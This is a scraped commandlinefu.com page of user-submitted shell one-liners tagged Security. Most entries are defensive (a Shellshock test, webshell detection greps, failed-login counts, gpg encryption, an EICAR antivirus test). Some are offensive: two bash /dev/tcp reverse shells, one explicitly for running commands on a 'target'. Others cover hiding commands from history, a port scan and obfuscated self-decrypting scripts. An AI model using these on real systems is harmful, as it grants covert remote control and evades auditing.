Hide

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.


Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Universal configuration monitoring and system of record for IT.
Hide

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

Hide

News

May 19, 2015 - A Look At The New Commandlinefu
I've put together a short writeup on what kind of newness you can expect from the next iteration of clfu. Check it out here.
March 2, 2015 - New Management
I'm Jon, I'll be maintaining and improving clfu. Thanks to David for building such a great resource!
Hide

Top Tags

Hide

Functions

Psst. Open beta.

Wow, didn't really expect you to read this far down. The latest iteration of the site is in open beta. It's a gentle open beta-- not in prime-time just yet. It's being hosted over at UpGuard (link) and you are more than welcome to give it a shot. Couple things:

  • » The open beta is running a copy of the database that will not carry over to the final version. Don't post anything you don't mind losing.
  • » If you wish to use your user account, you will probably need to reset your password.
Your feedback is appreciated via the form on the beta page. Thanks! -Jon & CLFU Team

Commands tagged Security from sorted by
Terminal - Commands tagged Security - 45 results
head -n1 | xargs -I {} aws sts get-session-token --serial-number $MFA_ID --duration-seconds 900 --token-code {} --output text --query [Credentials.AccessKeyId,Credentials.SecretAccessKey,Credentials.SessionToken]
2016-04-12 10:57:00
User: keymon
Functions: head xargs
1

You might want to secure your AWS operations requiring to use a MFA token. But then to use API or tools, you need to pass credentials generated with a MFA token.

This commands asks you for the MFA code and retrieves these credentials using AWS Cli. To print the exports, you can use:

`awk '{ print "export AWS_ACCESS_KEY_ID=\"" $1 "\"\n" "export AWS_SECRET_ACCESS_KEY=\"" $2 "\"\n" "export AWS_SESSION_TOKEN=\"" $3 "\"" }'`

You must adapt the command line to include:

* $MFA_IDis ARN of the virtual MFA or serial number of the physical one

* TTL for the credentials

debsecan --format detail
2015-10-22 18:46:41
User: pdxdoughnut
3

You can search for CVEs at https://security-tracker.debian.org/tracker/ or use --report to get full links. This can be added to cron, but unless you're going to do manual patches, you'd just be torturing yourself.

wget -O - http://list.iblocklist.com/\?list\=ydxerpxkpcfqjaybcssw\&fileformat\=p2p\&archiveformat\=gz | gunzip > ~/ipfilter.p2p
2015-10-11 13:04:08
User: lordtoran
Functions: gunzip wget
2

Downloads Bluetack's level 1 IP blocklist in .p2p format, suitable for various Bittorrent clients.

x="() { :; }; echo x" bash -c :
2014-12-08 22:21:18
User: malathion
Functions: bash
Tags: Security bash
3

If this command prints 'x' then your shell is vulnerable. Null output confirms that you are protected. Further reading: http://allanmcrae.com/2014/09/shellshock-and-arch-linux/

export HISTCONTROL=ignorespace
2013-07-25 08:31:10
User: gorynka
Functions: export
3
<space>secret_command;export HISTCONTROL=

This will make "secret_command" not appear in "history" list.

for ii in $(find /path/to/docroot -type f -name \*.php); do echo $ii; wc -lc $ii | awk '{ nr=$2/($1 + 1); printf("%d\n",nr); }'; done
2013-04-05 19:06:17
Functions: awk echo find wc
0

I have found that base64 encoded webshells and the like contain lots of data but hardly any newlines due to the formatting of their payloads. Checking the "width" will not catch everything, but then again, this is a fuzzy problem that relies on broad generalizations and heuristics that are never going to be perfect.

What I have done is set an arbitrary threshold (200 for example) and compare the values that are produced by this script, only displaying those above the threshold. One webshell I tested this on scored 5000+ so I know it works for at least one piece of malware.

find ./public_html/ -name \*.php -exec grep -HRnDskip "\(passthru\|shell_exec\|system\|phpinfo\|base64_decode\|chmod\|mkdir\|fopen\|fclose\|readfile\) *(" {} \;
2013-04-03 12:42:19
User: lpanebr
Functions: find grep
0

Searched strings:

passthru, shell_exec, system, phpinfo, base64_decode, chmod, mkdir, fopen, fclose, readfile

Since some of the strings may occur in normal text or legitimately you will need to adjust the command or the entire regex to suit your needs.

tar zcf - foo | gpg -c --cipher-algo aes256 -o foo.tgz.gpg
2013-03-13 09:44:39
User: skkzsh
Functions: gpg tar
0

Decrypt with:

gpg -o- foo.tgz.gpg | tar zxvf -
read -p 'Script: ' S && C=$S.crypt H='eval "$((dd if=$0 bs=1 skip=//|gpg -d)2>/dev/null)"; exit;' && gpg -c<$S|cat >$C <(echo $H|sed s://:$(echo "$H"|wc -c):) - <(chmod +x $C)
2013-03-10 08:59:45
User: rodolfoap
Functions: cat chmod echo gpg read sed wc
6

(Please see sample output for usage)

Use any script name (the read command gets it) and it will be encrypted with the extension .crypt, i.e.:

myscript --> myscript.crypt

You can execute myscript.crypt only if you know the password. If you die, your script dies with you.

If you modify the startup line, be careful with the offset calculation of the crypted block (the XX string).

Not difficult to make script editable (an offset-dd piped to a gpg -d piped to a vim - piped to a gpg -c directed to script.new ), but not enough space to do it on a one liner.

Sorry for the chmod on parentheses, I dont like "-" at the end.

Thanks flatcap for the subshell abbreviation to /dev/null

echo "eval \"\$(dd if=\$0 bs=1 skip=XX 2>/dev/null|gpg -d 2>/dev/null)\"; exit" > script.secure; sed -i s:XX:$(stat -c%s script.secure): script.secure; gpg -c < script.bash >> script.secure; chmod +x script.secure
2013-03-09 11:16:48
User: rodolfoap
Functions: chmod echo gpg sed stat
5

(Please see sample output for usage)

script.bash is your script, which will be crypted to script.secure

script.bash --> script.secure

You can execute script.secure only if you know the password. If you die, your script dies with you.

If you modify the startup line, be careful with the offset calculation of the crypted block (the XX string).

Not difficult to make script editable (an offset-dd piped to a gpg -d piped to a vim - piped to a gpg -c directed to script.new ), but not enough space to do it on a one liner.

dd if=/dev/zero of=T bs=1024 count=10240;mkfs.ext3 -q T;E=$(echo 'read O;mount -o loop,offset=$O F /mnt;'|base64|tr -d '\n');echo "E=\$(echo $E|base64 -d);eval \$E;exit;">F;cat <(dd if=/dev/zero bs=$(echo 9191-$(stat -c%s F)|bc) count=1) <(cat T;rm T)>>F
2013-01-31 01:38:30
User: rodolfoap
6

This is just a proof of concept: A FILE WHICH CAN AUTOMOUNT ITSELF through a SIMPLY ENCODED script. It takes advantage of the OFFSET option of mount, and uses it as a password (see that 9191? just change it to something similar, around 9k). It works fine, mounts, gets modified, updated, and can be moved by just copying it.

USAGE: SEE SAMPLE OUTPUT

The file is composed of three parts:

a) The legible script (about 242 bytes)

b) A random text fill to reach the OFFSET size (equals PASSWORD minus 242)

c) The actual filesystem

Logically, (a)+(b) = PASSWORD, that means OFFSET, and mount uses that option.

PLEASE NOTE: THIS IS NOT AN ENCRYPTED FILESYSTEM. To improve it, it can be mounted with a better encryption script and used with encfs or cryptfs. The idea was just to test the concept... with one line :)

It applies the original idea of http://www.commandlinefu.com/commands/view/7382/command-for-john-cons for encrypting the file.

The embedded bash script can be grown, of course, and the offset recalculation goes fine. I have my own version with bash --init-file to startup a bashrc with a well-defined environment, aliases, variables.

exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
2012-11-16 02:48:01
User: somaddict
Functions: cat exec read
8

This is sneaky.

First, start a listening service on your box.

nc -l 8080 -vvv &

On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor.

exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done

You can send it to the background like this:

(exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) &

Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client.

sudo lastb | awk '{if ($3 ~ /([[:digit:]]{1,3}\.){3}[[:digit:]]{1,3}/)a[$3] = a[$3]+1} END {for (i in a){print i " : " a[i]}}' | sort -nk 3
2012-09-11 14:51:10
User: sgowie
Functions: awk lastb sort sudo
1

The lastb command presents you with the history of failed login attempts (stored in /var/log/btmp). The reference file is read/write by root only by default. This can be quite an exhaustive list with lots of bots hammering away at your machine. Sometimes it is more important to see the scale of things, or in this case the volume of failed logins tied to each source IP.

The awk statement determines if the 3rd element is an IP address, and if so increments the running count of failed login attempts associated with it. When done it prints the IP and count.

The sort statement sorts numerically (-n) by column 3 (-k 3), so you can see the most aggressive sources of login attempts. Note that the ':' character is the 2nd column, and that the -n and -k can be combined to -nk.

Please be aware that the btmp file will contain every instance of a failed login unless explicitly rolled over. It should be safe to delete/archive this file after you've processed it.

echo -n 'the_password' | md5sum -
md5sum<<<'text to be encrypted'
2012-02-14 19:57:52
User: waldvogel
Functions: md5sum
1

Here Strings / A variant of here documents, the format is:

(from bash manpage)

gpg -c <filename>
2011-11-21 06:26:59
User: Dhinesh
Functions: gpg
Tags: Security
3

This will encrypt your single file and create a filename.gpg file.

Option: * -c : Encrypt with symmetric cipher

To decrypt

[email protected]:~$ gpg -c sample.rb.gpg

<space> secret -p password
2011-09-16 12:41:16
User: pcholt
1

Put a space in front of your command on the command line and it will not be logged as part of your command line history.

nmap -sT -PN -vv <target ip>
2011-07-22 02:37:19
User: Richie086
0

Change the IP address from 127.0.0.1 to the target machines ip address. Even if the target has ICMP (ping) blocked, it will show you what ports are open on the target. Very handy for situations where you know the target is up and online but wont respond to pings.

gswin32c -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pdfwrite -sFONTPATH=%windir%/fonts;xfonts;. -sPDFPassword= -dPDFSETTINGS=/prepress -dPassThroughJPEGImages=true -sOutputFile=OUTPUT.pdf INPUT.pdf
openssl s_client -connect localhost:443 -ssl2
bash -i >& /dev/tcp/IP/PORT 0>&1
sitepass2() {salt="this_salt";pass=`echo -n "$@"`;for i in {1..500};do pass=`echo -n $pass$salt|sha512sum`;done;echo$pass|gzip -|strings -n 1|tr -d "[:space:]"|tr -s '[:print:]' |tr '!-~' 'P-~!-O'|rev|cut -b 2-15;history -d $(($HISTCMD-1));}
2010-12-09 08:42:24
User: Soubsoub
Functions: cut gzip strings tr
Tags: Security
-4

This is a safest variation for "sitepass function" that includes a SALT over a long loop for sha512sum hash

sudo -K
2010-10-05 12:44:26
User: b_t
Functions: sudo
17

By default sudo 'remembers' password for a few minutes, so that you do not need to re-enter password for a series of sudo commands that might follow within a short time duration.

However, sometime you might want sudo to instantly 'forget' the password.

(Next sudo command will need you to reenter the password)

Credit: I first learned this while listening to one of the 'tuxradar' podcast.

echo [email protected][4\CMK54(C^)7PP)7}$RVPNE-FGNAQNEQ-NAGVIVEHF-GRFG-SVYR!$U+U*' | tr '[A-Za-z]' '[N-ZA-Mn-za-m]' > /tmp/eicar.com
2010-08-13 21:39:35
User: cyberscribe
Functions: echo tr
1

Test whether real-time virus detection is working by running this command and checking for eicar.com in /tmp. Requires real-time scanning to be enabled and active on the /tmp directory. If scanning is active, the file should be quarantined/deleted (depending on your settings) moments after running this command. If not, the (harmless) test file should remain in your /tmp directory.